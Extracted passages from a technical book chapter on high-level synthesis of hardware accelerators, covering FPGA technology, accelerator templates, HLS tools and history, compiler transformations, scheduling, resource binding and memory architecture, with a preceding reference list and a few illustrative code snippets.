Heidelberg, pp 254–271
Karuri K, Chattopadhyay A, Hohenauer M, Leupers R, Ascheid G, Meyr H (2007) Increasing data-
bandwidth to instruction-set extensions through register clustering. In IEEE/ACM international
conference on computer-aided design (ICCAD)
Karuri K, Chattopadhyay A, Chen X, Kammler D, Hao L, Leupers R, Meyr H, Ascheid G
(2008) A design flow for architecture exploration and implementation of partially reconfigurable
processors. IEEE Trans Very Large Scale Integr Syst 16(10):1281–1294
Khare A, Savoiu N, Halambi A, Grun P, Dutt N, Nicolau A (1999) V-SAT: a visual specification and
analysis tool for system-on-chip exploration. In EUROMICRO conference, 1999. Proceedings.
25th, vol 1, pp 196–203
Kraemer S, Gao L, Weinstock J, Leupers R, Ascheid G, Meyr H (2007) HySim: a fast simulation
framework for embedded software development. In: CODES+ISSS ‘07: proceedings of the 5th
IEEE/ACM international conference on hardware/software codesign and system synthesis, pp
75–80
Lanneer D, Praet J, Kifli A, Schoofs K, Geurts W, Thoen F, Goossens G (1995) CHESS:
retargetable code generation for embedded DSP processors. Code Generation for Embedded
Processors, pp 85–102
Leupers R, Marwedel P (1998) Retargetable code generation based on structural processor
description. Des Autom Embed Syst 3(1):75–108
Leupers R, Karuri K, Kraemer S, Pandey M (2006) A design flow for configurable embedded
processors based on optimized instruction set extension synthesis. In: DATE ‘06: proceedings
of the conference on design, automation and test in Europe. European Design and Automation
Association, pp 581–586
Leupers R, Chattopadhyay A, Dutt N, Mishra P (2016) Processor modeling and design tools.
Chapter 9 of EDA for IC system design, verification and testing (Volume 1 of the Electronic
Design Automation for Integrated Circuits Handbook, Second Edition), edited by L. Lavagno,
I. Markov, G. Martin, and L. Scheffer, CRC Press/Taylor and Francis
Machetti S (2018) ASIP design for motion estimation in video compression algorithms. PhD
Thesis. Politecnico di Torino
Makimoto T (2002) The hot decade of field programmable technologies. IEEE international
conference on field-programmable technology, 2002. (FPT). Proceedings, pp 3–6. https://doi.
org/10.1109/FPT.2002.1188657
Martin G, Nicolaescu D (2018) Enhancing DSP design productivity with automated generators.
unpublished paper, 2018. (Available by emailing )
Marwedel P (1979) The MIMOLA design system: detailed description of the software system.
16th Design Automation Conference, pp 59–63. https://doi.org/10.1109/DAC.1979.1600089
Maydan D (2011) Evolving voice and audio requirements for smartphones. Linley Technology
Mobile Conference
Meyr H, Chattopadhyay A, Leupers R (2008) LISA: a uniform ADL for embedded processor mod-
elling, implementation and software toolsuite generation. In: Processor description languages,
edited by P. Mishra and N. Dutt, pp 95–130
Mishra P (2005) Processor validation: a top-down approach. Potentials, IEEE 24(1):29–33
Mishra P, Dutt N (2004a) Modeling and validation of pipeline specifications. ACM Trans Embed
Comput Syst 3(1):114–139
Mishra P, Dutt N (2004b) Graph-based functional test program generation for pipelined processors.
In Design, automation and test in Europe conference and exhibition, 2004. Proceedings, vol 1,
pp 182–187
Mishra P, Dutt N (2005a) Functional coverage driven test generation for validation of pipelined
processors. In Proceedings of the conference on design, automation and test in Europe - Volume
2, DATE ‘05, pp 678–683
Mishra P, Dutt N (2005b) Architecture description languages for programmable embedded
systems. In: IEE Proceedings on computers and digital techniques
Mishra P, Dutt N (eds) (2008) Processor description languages. Morgan Kaufmann Publishers Inc
Mishra P, Dutt N, Tomiyama H (2003) Towards automatic validation of dynamic behavior in
pipelined processor specifications. Des Autom Embed Syst 8(2–3):249–265
Mishra P, Kejariwal A, Dutt N (2004) Synthesis-driven exploration of pipelined embedded
processors. In VLSI design, 2004. Proceedings of the 17th international conference on, pp 921–
926
Nohl A, Braun G, Schliebusch O, Leupers R, Meyr H, Hoffmann A (2002) A universal technique
for fast and flexible instruction-set architecture simulation. In Proceedings of the 39th annual
design automation conference, DAC ‘02, pp 22–27
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 842
Background: Technology and Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 844
Target Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 844
Accelerator Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 846
Accelerator Template . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 847
Introduction to High-Level Synthesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 848
A Traditional High-Level Synthesis Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 848
A Bit of History on Commercial Products and Academic Projects . . . . . . . . . . . . . . . . . . . 850
From Input Specification to Intermediate Representation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 851
Input Specification and Intermediate Representation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 851
Analysis and Optimization of the Intermediate Representation . . . . . . . . . . . . . . . . . . . . . . 853
Creation of the Microarchitecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 855
Scheduling and Performance Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 855
Binding and Resource Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 857
Definition of the Memory Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 859
Creation of the FSM Controller . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 863
RTL Generation and System Integration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 863
Code Generation, Evaluation, and Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 863
System-Level Integration and Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 864
Open and Modern Challenges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 865
Creation of Domain-Specific Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 865
Programmability and System-Level Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 867
Hardware Security and Data Protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 868
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 868
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 869
Abstract
Keywords
Introduction
Fig. 1 Example of heterogeneous platform: CPUs and auxiliary elements are predesigned com-
ponents, while accelerators can be designed with HLS. The FPGA can host the entire system or
only some accelerators
Target Technology
When selecting the processing elements for an architecture, designers have to face
the never-ending challenge of trading off performance and flexibility, as shown in
Fig. 2. While performance is the main optimization goal for many applications,
flexibility allows them to reuse the same system for different applications. The
traditional central processing unit (CPU) is the most flexible component, able to
execute any kind of application, sacrificing performance and energy efficiency. A
specialized processor, like a digital signal processor (DSP), a graphics processing
unit (GPU), or a tensor processing unit (TPU), offers better performance for
application-specific workloads (e.g., audio, video, or machine-learning applications)
while maintaining a certain degree of flexibility.
A field-programmable gate array (FPGA) device is an array of elements
that can be configured by the user to execute a specific functionality even after
fabrication, as shown in Fig. 3. For this reason, the elements are called configurable
Fig. 2 Trading off performance and flexibility by using different target technologies. (Adapted
from Ndu 2012)
Fig. 3 High-level FPGA organization: the device contains an array of configurable elements and
heterogeneous resources (e.g., DSP and Block RAMs). It may also feature dedicated engines that
are designed and optimized for AI processing
logic blocks and their configuration is called a bitstream. FPGAs have the flexibility
of processor-like architectures since they can be reused (after reconfiguration)
to execute different workloads, but they can achieve performance comparable to
ASICs, thanks to the possibility of implementing specialized microarchitectures on
the configurable blocks. Some FPGA devices also offer the possibility of changing
their functionality during the execution through partial dynamic reconfiguration.
Designers create all partial bitstreams statically (i.e., partial configurations only for
the specific FPGA region where the accelerators will be placed). The reconfigu-
ration loads the proper partial bitstream into the corresponding region through a
specific port, called an Internal Configuration Access Port (ICAP). This process
is time-consuming and used only when the benefits of hardware accelerators
are much greater than the reconfiguration time. A coarse-grain reconfigurable
Accelerator Models
Designers have several alternatives for creating the microarchitecture of specialized
accelerators, notably because of the different possible execution modes (Cota et al. 2015).
Configurable, extensible processors have specific accelerators integrated into the
pipeline of the given CPU to improve the execution of specific code portions.
The selected code to be accelerated is represented with a new instruction, and,
for this reason, the components are commonly referred to as custom instruction
set extensions (Brisk et al. 2004). After selecting the kernel instructions and
extending the compiler to target them (Galuzzi et al. 2006), HLS can create the
RTL microarchitecture of the accelerator to be integrated in the processor datap-
ath (Pothineni et al. 2010). Commercial products like Synopsys ARC and Cadence
Xtensa feature complete toolchains to profile the application, identify hot-spots
to be accelerated, and integrate the corresponding RTL modules. Accelerator-rich
architectures feature, instead, several stand-alone components that are designed to
provide peak performance for selected large kernels or even complete applications.
Large data sets are usually stored in an external memory (e.g., DRAM) that
is accessed with specific interfaces. Such accelerators can be configurable with
parameters that the user can specify (usually through input ports) to select a specific
functionality of the component. While components can be extremely complex,
many modern applications can be reduced to operations on large streams of
data. This is, for example, the case of machine-learning applications that need to
perform simple operations (e.g., convolutions) on many data. Control constructs
and synchronization can be introduced to reuse the same hardware resources to
iteratively operate on new data using the same concepts as software loops. To reduce
the complexity of large designs, designers can create dataflow architectures as a
collection of components communicating with latency-insensitive protocols (Car-
loni 2015). The specialization of the components can target the composition of
the block (Edwards et al. 2019), the memory architecture (Pilato et al. 2017), or
Accelerator Template
[Fig. 4 shows the accelerator template: a controller and a datapath with multiple private local memories (PLMs), configuration registers, and an external interface]
from one component to the next (Giri et al. 2020). The processor core (CPU)
executes a software application to prepare the data in memory and configure the
accelerator through the interconnection system (e.g., a bus or a network-on-chip)
with memory-mapped operations on the configuration registers that are connected
to the input ports (Mantovani et al. 2020). The data stored in the external memory
(DRAM) are accessed through one or more memory controllers (Mantovani et al.
2016a). DMA mechanisms allow accelerators to exchange large data blocks with
DRAM (Cota et al. 2015; Pilato et al. 2017). When moved inside accelerators,
the data are stored in private local memories (PLMs) for fast access. PLMs can
also store data for the entire execution of the accelerator (Pilato et al. 2011b).
Accelerators access PLM data with known latency (e.g., one or two cycles), while
the latency of external accesses is usually unpredictable. While PLM accesses
make the scheduling of memory operations and the controller creation simpler,
accelerators must implement latency-insensitive memory interfaces to guarantee
execution correctness when accessing external data. An FPGA can host the entire
system or only the accelerator part. In the latter case, the FPGA is combined
with a hard-core processor through an interconnection fabric or is a stand-alone
component, like in the IBM cloudFPGA project (Weerasinghe et al. 2016). IP and
technology vendors provide intellectual property (IP) blocks for common functions.
For example, Synopsys and Cadence offer soft IPs for high-speed communication
(e.g., SerDes IPs) like Ethernet physical layers. Similarly, FPGA vendors offer a list
of configurable IPs for common peripherals like DMA controllers to exchange data
with external memory banks, to access USB ports and PCIe bridges, and to display
data through video controllers.
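As a concrete illustration of the configure-and-run pattern described above (the base address and register offsets below are hypothetical; every platform defines its own memory map), the CPU-side code to launch one accelerator might look like:

#include <stdint.h>

/* Hypothetical memory-mapped configuration registers of one accelerator */
#define ACC_BASE   0x60000000u
#define REG_SRC    (*(volatile uint32_t *)(ACC_BASE + 0x00))  /* DRAM source address */
#define REG_DST    (*(volatile uint32_t *)(ACC_BASE + 0x04))  /* DRAM destination    */
#define REG_LEN    (*(volatile uint32_t *)(ACC_BASE + 0x08))  /* data size in bytes  */
#define REG_CTRL   (*(volatile uint32_t *)(ACC_BASE + 0x0c))  /* start bit           */
#define REG_STATUS (*(volatile uint32_t *)(ACC_BASE + 0x10))  /* done bit            */

void run_accelerator(uint32_t src, uint32_t dst, uint32_t len) {
    REG_SRC = src;        /* data already prepared in DRAM by the software */
    REG_DST = dst;
    REG_LEN = len;
    REG_CTRL = 1;         /* start: the accelerator DMAs data into its PLMs */
    while ((REG_STATUS & 1) == 0)
        ;                 /* poll until done (an interrupt could be used instead) */
}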
The design of specialized hardware accelerators requires a design flow that allows
designers to generate the register-transfer level (RTL) microarchitecture associ-
ated with the desired functionality. High-level synthesis is a key technology in
this context. It automatically translates an input high-level specification into the
corresponding RTL implementation ready for logic synthesis (either for ASIC or
FPGA technologies). High-level synthesis is, indeed, a collection of methods and
algorithms to automatically define the RTL microarchitecture of a hardware module
starting from the specification of its functionality at a higher level of abstraction.
This process is similar to the generation of machine code for programmable
processors by compilers.
Figure 5 shows the overall organization of a classic HLS flow. The high-level code
represents the input functionality to implement. The designer can start from an
existing algorithm described in software-like languages (e.g., C, C++, or Python),
[Fig. 5 shows the organization of a classic HLS flow: hardware/software partitioning separates synthesizable code from software code; the mid-level HLS engine performs module/data allocation, scheduling, binding, and RTL generation over a hardware IR; and the back-end performs code generation]
Finally, the back-end phase produces the artifacts for the subsequent design steps.
First, code generation produces the target RTL description in the desired hardware
description language (HDL) (RTL design). Similarly, testbench generation and
interface generation produce elements to support system-level integration and
verification of both the component and the system, respectively. This entire process
can be part of a larger design-space exploration framework to trade-off the different
design objectives within the final system.
The first HLS projects targeted ASIC with so-called silicon compilers (Gajski 1984;
Brewer and Gajski 1990), used especially for simple, data-intensive applications.
For example, Chippe (Brewer and Gajski 1990) included layout constraints during
behavioral synthesis. As the complexity of the hardware modules started increasing,
designers shifted toward high-level languages and compiler-based HLS frame-
works (Bazargan et al. 2000). Also, since FPGA devices allow for a fast turnaround
time to achieve a solution while ASIC requires extensive fine tuning of the designs,
HLS tools have been mostly developed for FPGA (Cong et al. 2011), with several
academic prototypes and commercial solutions (Nane et al. 2016) (see Chap. 28,
“FPGA-Specific Compilers” for more details on FPGA HLS tools).
Commercial tools are more oriented to a horizontal approach, simplifying
coding, porting, and analysis of the solutions. In most cases, such tools are
offered by FPGA vendors to simplify the use of their devices, in some cases free
of charge. For example, Xilinx Vivado HLS targets Xilinx FPGA devices, and
Intel HLS Compiler produces RTL code for Intel FPGA devices. Other tools,
like Siemens EDA Catapult HLS or Microsemi LegUp HLS Compiler, are
not vendor specific and can target a broader range of devices. Some HLS tools
also target ASIC, like Cadence Stratus, Siemens EDA Catapult HLS, and NEC
CyberWorkBench. All these tools have graphical user interfaces or TCL scripts
to automate the steps, with good estimators for performance and resource usage.
Indeed, they are often tightly connected to logic synthesis tools to provide accurate
resource characterizations, especially in case of ASIC. Most HLS tools also provide
synthesizable libraries of communication and synchronization protocols for building
more complex systems by focusing only on computational aspects (Guglielmo et al.
2014).
Academic projects, instead, are usually more focused on research and experimen-
tation with a vertical approach. For example, Spark (Gupta et al. 2003) was the first
public HLS framework, where the designer could set constraints on the resources
to show the relevance and impact of compiler transformations. GAUT (Coussy
et al. 2008) was a framework for DSP applications. GAUT introduced the concepts
of memory mapping, communication modules, and I/O timing to create pipelined
architectures. xPilot (Cong et al. 2006) was the first project to provide a complete
framework for the synthesis of application-specific configurable processors and
heterogeneous multicore architectures, focusing on FPGA targets. xPilot was later
acquired by Xilinx to become the base of Vivado HLS, one of the most complete
and easy-to-use HLS tools on the market.
was an open-source HLS framework based on LLVM that allowed the creation
of complete SoC architectures for Altera (now Intel) FPGA devices. Thanks to
its modular organization, it has been widely used to prototype different types
of solutions for HLS problems, like bit-width analysis (Klimovic and Anderson
2013), profiling-driven optimization (Hadjis et al. 2015), and the effects of compiler
optimizations (Huang et al. 2015). It is now discontinued as it became a commercial
product, Microsemi LegUp HLS Compiler. Bambu (Pilato and Ferrandi 2013)
is one of the remaining open-source HLS frameworks. It allows designers to
experiment with HLS solutions, thanks to a modular and dynamic compilation
framework based on both GCC and LLVM (Lattuada and Ferrandi 2019). It
focuses on the problem of understanding how to synthesize C/C++ semantics. To
do so, it offers a unique memory microarchitecture that supports most of the C
constructs without semantic changes (including dynamic pointer resolution and
memory allocation (Pilato et al. 2011b)). It has also been used to integrate solutions
for hardware- and hardware-assisted security, like intrinsic dynamic information
flow tracking (Pilato et al. 2019), IP watermarking (Pilato et al. 2018b), and
algorithm-level obfuscation (Pilato et al. 2018c). There are also projects that focus
on specific accelerator models (like dataflow compilers) or application domains (like
deep learning), especially for FPGA targets. The interested reader can refer to the
Chap. 28, “FPGA-Specific Compilers” for more details.
This section discusses the transition from the input high-level specification into a
language-agnostic representation that is optimized for hardware generation. One of
the first major challenges in HLS is the right choice of input language and compiler
(with associated transformations) based on the characteristics and requirements of
the given application (e.g., the expected latency).
Most preexisting algorithms are described with traditional languages (like C, C++,
Fortran, etc.). Therefore, modern HLS tools are mostly built on top of state-of-the-
art software compilers, like LLVM and GCC (Buyukkurt et al. 2011; Huang et al.
2015). These compilers handle many input languages and ease the porting of
legacy code into hardware. Also, they leverage many years of research
in compiler construction to extract, analyze, and optimize a representation that is
more suitable to hardware implementation. To simplify compiler optimizations, the
IR is usually translated into a static single assignment (SSA) form where multiple
assignments to the same variable create different versions, as shown in Fig. 6.
Source-to-source compilers can rewrite existing code into a more hardware-friendly
Fig. 6 Example of code (a), its corresponding static single assignment (SSA) form (b), and the
optimized IR after strength reduction and dead-code elimination (c):
(a) y = x + 1;  y = x * 2;  w = y
(b) y1 = x2 + 1;  y2 = x2 * 2;  w1 = y1
(c) y1 = x2 + 1;  y2 = x2 << 1;  w1 = y1 (dead code)
format and expose more “knobs” for optimization (Cong et al. 2016). For example,
since commercial HLS tools use directives to optimize the input code, source-to-
source transformations can automatically insert identifiers (e.g., loop labels) and
transform the code to better apply synthesis directives.
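For instance, for tools that accept Vivado-HLS-style directives, a source-to-source pass might produce labeled, annotated code like the following (the function, label, and unroll factor are illustrative):

// Illustrative HLS input: the label lets directives and scripts target the loop
void vadd(const int a[64], const int b[64], int out[64]) {
vadd_loop:
    for (int i = 0; i < 64; i++) {
#pragma HLS PIPELINE II=1
#pragma HLS UNROLL factor=4
        out[i] = a[i] + b[i];
    }
}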
Modern machine-learning applications make heavy use of operations on multi-
dimensional arrays, also called “tensors.” These applications are often extremely
parallel and suitable for hardware acceleration. In such systems, the creation of
the memory architecture demands efficient methods to describe the operations and
the data access patterns. Many languages have been proposed as the front end to
HLS frameworks to better expose such details. Halide (Ragan-Kelley et al. 2013)
simplifies the descriptions of high-performance image and array processing code,
while Halide-HLS (Pu et al. 2017) is an extension to target FPGAs. Machine-
learning applications are built almost exclusively with Python-based frameworks
like PyTorch, TensorFlow, Caffe, etc. Python is a popular language that hides
many details from the programmers. Compilers translate Python representations into
code that can be processed by HLS tools based on traditional IRs.
Traditional compilers progressively transform the IR into simpler operations that
are later mapped onto machine instructions. This process loses information that is
important for hardware generation, like the size of the data structures and the
access patterns across operations that help define the memory system. Designers are
working to extend these representations so that more information is preserved across
compiler passes until it reaches the HLS flow. For example, Google recently proposed the LLVM
Multi-Level Intermediate Representation (MLIR) (Lattner et al. 2020) to create
a customizable compilation framework that provides information at different levels.
Similarly, Heterogeneous Parallel Virtual Machine (HPVM) (Kotsifakou et al.
2018) is a representation for a parallel compiler that aims at simplifying the
implementation of code for parallel hardware. These representations are often combined with
domain-specific languages where the designer can abstract specific hardware details.
For example, Spatial (Koeplinger et al. 2018) is a recent language to describe
hardware accelerators at a higher level. Such descriptions are later compiled and
translated into Chisel and then into Verilog. These frameworks can be considered
“hardware generators” rather than complete HLS tools. Indeed, they
operate more as “translators” from the input to the output descriptions, with limited
optimizations.
The next phase analyzes and transforms the IR extracted from the source code
to create a more hardware-friendly representation and optimize the component to
generate. Applying IR-level transformations simplifies the following HLS steps,
improving the accelerator’s performance or reducing its hardware cost. Some
transformations are borrowed from traditional compiler optimizations, while others
are specific for hardware. This is another motivation for which it is convenient to
base HLS on stable and mature compiler frameworks.
Constant propagation and strength reduction are classic compiler transfor-
mations that can simplify or even eliminate arithmetic operations in the code. For
example, the instruction “x_2 * 2” of Fig. 6 can be transformed into “x_2 << 1”
(see Fig. 6c): a left shifter is much more hardware-efficient than a multiplier.
Designers may replace some variables with constants representing their average
values to leverage these optimizations. These transformations are usually referred to
as software approximation techniques and allow designers to obtain efficient
hardware despite minor errors in the results. Dead-code elimination removes
unnecessary code, which will be otherwise translated into unnecessary hardware
(see, e.g., instruction “w_1 = y_1” in Fig. 6c). This applies, for example, when
control code depends on input parameters that, in specific accelerator instances,
are always set to constant values. HLS is often limited by control constructs, like
if-then-else statements. Operations in the true/false branches cannot
start their execution until the condition is evaluated. Code speculation moves
some operations before the condition evaluation so that they can be executed in
parallel (Lattuada and Ferrandi 2015). Results are temporarily stored in registers
and, after evaluating the condition, the values of the “wrong” operations are
discarded. This optimization increases the available parallelism, leading to better
performance.
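A minimal C sketch of the idea (the transformation is performed on the IR by the HLS engine, not by hand):

    int select_op(int a, int b, int x, int y) {
        // Original form: the multiply cannot start until (a > b) is known:
        //   if (a > b) r = x * y; else r = x + y;
        // Speculated form: both candidates are computed in parallel; the
        // condition only drives a multiplexer, and the value produced on
        // the "wrong" path is simply discarded.
        int t1 = x * y;
        int t2 = x + y;
        return (a > b) ? t1 : t2;
    }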
Compiler analyses and transformations can also reduce data dependencies and
increase hardware parallelism. For example, pointers are widely used to create effi-
cient software code. However, their implementation in hardware is complex because
a pointer-based operation must be connected to all the memory locations (either
internal or external) where the corresponding information is potentially stored. Alias
analysis helps determine if two pointers in the source code can ever refer to the
same memory location. If it can be proven that two pointers never refer to the
same object, there is no dependency, enabling more memory optimizations. Static
pointer resolution determines the exact variable accessed by a pointer operation,
eliminating the need for an explicit pointer. This information can be later used
to optimize the creation of the memory architecture (see Section “Creation of the
Microarchitecture”) because the two operations can potentially run in parallel when
proved to access different data (Pilato et al. 2011b). Additional memory analyses
determine the list of data structures to allocate in memory and their characteristics
(e.g., size and bit-width) for determining whether the corresponding memories fit
inside the area constraints of the accelerators. Other transformations operate on the
data structures to expose more parallelism. Indeed, arrays are generally stored in
memories with limited ports. Designers can apply array partitioning and scalar
replacement of aggregates to reduce the number of memory dependencies.
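Two small sketches of how these analyses and transformations surface at the source level (the pragma follows Vivado HLS-style syntax; function names are illustrative):

    // Alias information: __restrict (C99 'restrict', as a C++ extension)
    // asserts that in and out never overlap, removing the load/store
    // ordering dependencies that a conservative alias analysis would keep.
    void scale(const int *__restrict in, int *__restrict out, int n) {
        for (int i = 0; i < n; i++)
            out[i] = in[i] * 3;
    }

    // Array partitioning: splitting A over 4 banks allows 4 concurrent
    // reads per cycle instead of the 1-2 ports of a single memory.
    void sum4(const int A[1024], int out[256]) {
    #pragma HLS ARRAY_PARTITION variable=A cyclic factor=4
        for (int i = 0; i < 256; i++)
            out[i] = A[4*i] + A[4*i+1] + A[4*i+2] + A[4*i+3];
    }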
While software developers can overestimate the bit requirements for some data,
many applications do not use the full range of the corresponding variables. Since a
processor’s hardware is already built with pre-defined registers and arithmetic-logic
units, the execution with overestimated variables has almost no extra cost. Hardware
specialization requires, instead, to determine the minimal resources needed for the
computation to trim unnecessary logic. Therefore, the front-end phase also performs
bit-width analysis to determine the required precision of each operation to maintain
execution correctness and bit-width transformations to propagate the information
through the design with iterative methods. Similar transformations also include
numerical conversions (e.g., from floating-point to fixed-point representations)
to reduce hardware cost but maintain a certain level of accuracy of the results.
In this context, many HLS tools, for example, Xilinx Vivado HLS and Cadence
Stratus, allow library extensions to manually specify the precision of input/output
data or to specify particular bit-level operations on the signals. This feature is
particularly useful when HLS is used to generate components to be integrated in
larger specialized systems like industrial machines. Synthesizable C++ libraries,
like HLSLibs, have been proposed to extend existing HLS tools with custom
precision.
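A small sketch using the AC datatypes from HLSLibs (assuming the ac_fixed header is available; the chosen widths are arbitrary):

    #include <ac_fixed.h>

    // 12 bits total, 4 integer bits, signed, round-to-nearest on
    // quantization, saturate on overflow.
    typedef ac_fixed<12, 4, true, AC_RND, AC_SAT> coeff_t;

    coeff_t filter_tap(coeff_t x, coeff_t c) {
        return x * c;   // multiplier sized to 12-bit operands, far
                        // cheaper than a 32-bit floating-point unit
    }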
Especially in data-intensive applications, loops account for most of the acceler-
ator execution, and it is complex to extract parallelism from their representations.
Most of the parallelism is often between consecutive iterations. While spatial exe-
cution can create multiple parallel instances of the loop body, hardware synthesis is
usually limited by the loop boundaries. Therefore, loop transformations are widely
used to expose more hardware parallelism. For example, loop unrolling replicates
multiple instances of a loop body to execute in the same iteration. Therefore, the
number of operations between control branches is increased, potentially leading to
more parallelism. However, this transformation requires a careful analysis of the
dependencies; otherwise, the multiple iterations in the same loop body are serialized
without an effective speedup. Artificial dependencies can also be due to conflicts on
resources, like in the case of limited memory ports, forcing the serialization of the
operations. Another important transformation is loop pipelining: consecutive loop
iterations are partially overlapped. This optimization follows the same principles of
instruction execution in pipelined processors, when an instruction can start before
the termination of the previous one. In this case, the initiation interval (II) is an
important parameter: it represents the number of cycles required by the loop to start
a new iteration. A perfect pipeline starts a new iteration after each cycle (II = 1).
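A hedged sketch of both transformations with Vivado HLS-style directives (directive syntax varies across tools):

    int mac128(const int a[128], const int b[128]) {
        int acc = 0;
        mac:
        for (int i = 0; i < 128; i++) {
    #pragma HLS UNROLL factor=4   // replicate 4 loop bodies per iteration
    #pragma HLS PIPELINE II=1     // target: start a new iteration each cycle
            // Note: the accumulation into acc is a loop-carried
            // dependency; together with limited memory ports, it may
            // force the tool to settle for II > 1.
            acc += a[i] * b[i];
        }
        return acc;
    }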
budget for each synchronous event), i.e., by estimating the slack of each clock
cycle (Chang et al. 1996). The slack is the margin between the delay of the circuit
and the given timing requirement. Negative slack means that the timing constraint is
violated, while a positive slack means that an extra delay could be tolerated. There
are multiple situations during scheduling (a numeric sketch follows the list):
• the operation terminates much earlier than the clock period (i.e., the slack is
positive and high); in this case, it might be possible to execute another operation
provided that it fits in the remaining time (operation chaining);
• the operation terminates right before the end of the clock period; the result will
be then used in a subsequent cycle and it must be stored in a register;
• the operation takes more than one cycle and its result shall be saved only when
finished (multi-cycling); in this case, if the functional unit is pipelined (i.e., it
contains internal registers to create computational stages), another operation can
start on the same resource even before the current one is completed.
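For intuition, here is a toy version of the chaining decision (the delays are invented; a real scheduler queries a characterized technology library). With a 5 ns clock, a 1.8 ns addition leaves 3.2 ns of slack, which is not enough to chain a 3.4 ns multiplication:

    // Returns nonzero if the second operation fits in the remaining slack.
    int can_chain(double clock_period, double first_op, double second_op) {
        double slack = clock_period - first_op; // time left in the cycle
        return second_op <= slack;              // 5.0 - 1.8 = 3.2 ns cannot
                                                // fit a 3.4 ns multiply, so
                                                // it starts in the next cycle
    }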
When data are allocated outside the accelerators, the HLS engine must follow safe assumptions
to guarantee correct execution in all cases: the corresponding data could be
allocated off-chip or multiple accelerators can access the same memory creating
contention and additional latency. Therefore, the scheduling algorithm must assume
the external memory operations have unknown latency (Ranjan Panda et al. 1998).
The same case applies to operations corresponding to unpredictable components,
like data-dependent submodules. In case of operations with unknown latency, the
scheduling uses latency-insensitive protocols (Carloni 2015) to guarantee that the
computation proceeds only when the operation is completed. However, executing
multiple operations with variable latency in the same clock cycle is complex.
Therefore, these operations are generally serialized by most HLS engines.
This serialization may become inefficient when trying to optimize the latency
or guarantee the worst-case execution time. Designers have proposed approaches for
dynamically scheduling the operations. While this concept is highly efficient, the
area overhead for implementing the control logic is high and the dynamic scheduling
is usually limited to specific cases, like memory-related operations (Pilato et al.
2011a; Josipović et al. 2018).
Resource sharing creates multiple connections at the input ports of functional units
(since a shared unit can receive operands from different sources) and registers
(since different variables could be produced by
distinct functional units). When a port receives signals from multiple sources, HLS
engines introduce multiplexers to determine the path active at any given time and
drive the signal values. The controller FSM generates control signals to activate the
proper paths from source to destination in each clock cycle (see Section “Creation
of the FSM Controller”). Resource binding has a huge impact on the number of
multiplexers to add. Several methods have been proposed to consider the impact
of interconnections during HLS. For example, register binding can be combined
with port swapping (Chen and Cong 2004). This optimization swaps the inputs of
commutative operations, aiming at reducing the number of paths to each port of the
units. This reduces, in turn, the number of multiplexers that are needed.
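A schematic example of the optimization (illustrative only; the decision is taken during binding, not in the source code):

    /* Binding example: two additions share one adder across two steps.
     *   step 1: s1 = a + b        step 2: s2 = c + a
     * Naive binding:   port0 receives {a, c}, port1 receives {b, a}
     *                  -> one multiplexer per port (2 total).
     * After swapping the commutative inputs of the second addition
     * (s2 = a + c):    port0 always receives a, port1 receives {b, c}
     *                  -> a single multiplexer, on port1 only.
     */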
Fig. 8 Resource optimizations for memory IPs with Mnemosyne (Pilato et al. 2017)
For example, ping-pong buffers that are never accessed at the same time can be placed
in the same memory bank (but in different memory spaces), and there will not be
port contention. This memory bank sharing can greatly reduce the resource usage.
Mnemosyne is a tool designed to generate an optimized memory architecture based
on a set of characteristics of the data structures and the access patterns that can be
provided by the designers (Pilato et al. 2017). The tool analyzes such compatibilities
and applies automatic technology-aware transformations (supporting both FPGA
and ASIC technologies) to select the proper physical banks in the given technology
and determines how to share these physical banks when the data structures mapped
on them have disjoint lifetimes. Mnemosyne encapsulates the memory banks
in lightweight memory interfaces that translate the logical requests to the data
structures into physical requests to the generated bank configuration (see Fig. 8).
Irregular memory accesses are often data dependent or require dynamic reso-
lution of the pointers. These operations are complex when executed in hardware
because of the limited flexibility, and only a few HLS tools support memory architec-
tures with dynamic pointer resolution. For example, Bambu builds a daisy-chain
architecture on top of alias-analysis results, as shown in Fig. 9. The memory
allocation step resolves the pointers, i.e., converts them into classic memory
operations, when the set of possible target data structures is limited to one. Such
operations are later directly connected to memory that stores the corresponding data
structure, potentially increasing the parallelism on memory operations. Operations
with pointers that cannot be “resolved” are connected in daisy-chain with the
potential memories. At design time, the HLS engine assigns a specific memory
address to every data structure and, in turn, the associated memory space both
on-chip and off-chip. At run time, when an address is propagated through the daisy-
chain, only one memory will be activated by the request. In particular, when the
address refers to data allocated off-chip, the request reaches the external memory
interface and is sent to the corresponding memory controller. The scheduling phase
can further distribute the memory accesses to hide the latency of memory transfers
especially when accessing the data off-chip.
